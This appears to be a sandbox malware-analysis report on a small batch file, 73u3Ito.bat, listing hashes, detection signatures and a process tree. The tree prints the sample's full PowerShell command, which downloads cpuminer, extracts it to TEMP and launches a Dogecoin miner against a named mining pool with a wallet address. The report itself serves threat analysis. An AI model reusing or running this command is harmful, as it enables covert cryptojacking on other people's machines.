Analysis
max time kernel
1793s
max time network
1798s
platform
windows10-1703_x64
resource
win10-20231215-en
resource tags
arch:x64, arch:x86, image:win10-20231215-en, locale:en-us, os:windows10-1703-x64, system
submitted
03/02/2024, 03:05
Static task
static1
Behavioral task
behavioral1
Sample
73u3Ito.bat
Resource
win10-20231215-en
Behavioral task
behavioral2
Sample
73u3Ito.bat
Resource
win10v2004-20231215-en
General
Target
73u3Ito.bat
Size
499B
MD5
fe74bff27516829a88cfbc6f6e99646f
SHA1
0c15d859211c79910b277d07e729bec7197a60cd
SHA256
b1f312f139949cac20d0591831ce57c227c6ac77ebd98edfcdafa5c0b02cd2bb
SHA512
a94dbaef073e7b62ff9827887f1da6837103316c5656719b176ba1c2a063066f5f159b8ca783208db629121beea33fb81a94b9e6f4f4ec2612ee923639947a98
Malware Config
Signatures

Blocklisted process makes network request (2 IoCs)
flow  pid  Process
2     876  powershell.exe
4     876  powershell.exe

Executes dropped EXE (1 IoCs)
pid   Process
2244  cpuminer-sse2.exe

Loads dropped DLL (5 IoCs)
pid   Process
2244  cpuminer-sse2.exe
2244  cpuminer-sse2.exe
2244  cpuminer-sse2.exe
2244  cpuminer-sse2.exe
2244  cpuminer-sse2.exe

Suspicious behavior: EnumeratesProcesses (3 IoCs)
pid  Process
876  powershell.exe
876  powershell.exe
876  powershell.exe

Suspicious use of AdjustPrivilegeToken (1 IoCs)
description              pid  Process
Token: SeDebugPrivilege  876  powershell.exe

Suspicious use of WriteProcessMemory (6 IoCs)
description                          pid   Process         procid_target
PID 3572 wrote to memory of 876      3572  cmd.exe         25
PID 3572 wrote to memory of 876      3572  cmd.exe         25
PID 876 wrote to memory of 4780      876   powershell.exe  76
PID 876 wrote to memory of 4780      876   powershell.exe  76
PID 4780 wrote to memory of 2244     4780  cmd.exe         78
PID 4780 wrote to memory of 2244     4780  cmd.exe         78
Processes

1. C:\Windows\system32\cmd.exe
   Command line: C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\73u3Ito.bat"
   - Suspicious use of WriteProcessMemory
   PID: 3572

   2. C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      Command line: powershell.exe -Command "Invoke-WebRequest -Uri 'https://github.com/JayDDee/cpuminer-opt/releases/download/v23.15/cpuminer-opt-23.15-windows.zip' -OutFile "$env:TEMP\cpuminer.zip"; Expand-Archive -Path "$env:TEMP\cpuminer.zip" -DestinationPath "$env:TEMP\cpuminer"; Set-Location -Path "$env:TEMP\cpuminer"; Start-Process -FilePath 'cmd.exe' -ArgumentList '/k', 'cpuminer-sse2.exe -a yespower -o stratum+tcp://yespower.na.mine.zpool.ca:6234 --userpass=DJXKcu8iouhRppneQL9XbYQ9ovs87y4cYZ:c=doge -t 2'"
      - Blocklisted process makes network request
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of AdjustPrivilegeToken
      - Suspicious use of WriteProcessMemory
      PID: 876

      3. C:\Windows\system32\cmd.exe
         Command line: "C:\Windows\system32\cmd.exe" /k cpuminer-sse2.exe -a yespower -o stratum+tcp://yespower.na.mine.zpool.ca:6234 --userpass=DJXKcu8iouhRppneQL9XbYQ9ovs87y4cYZ:c=doge -t 2
         - Suspicious use of WriteProcessMemory
         PID: 4780

         4. C:\Users\Admin\AppData\Local\Temp\cpuminer\cpuminer-sse2.exe
            Command line: cpuminer-sse2.exe -a yespower -o stratum+tcp://yespower.na.mine.zpool.ca:6234 --userpass=DJXKcu8iouhRppneQL9XbYQ9ovs87y4cYZ:c=doge -t 2
            - Executes dropped EXE
            - Loads dropped DLL
            PID: 2244
Network
MITRE ATT&CK Matrix
Downloads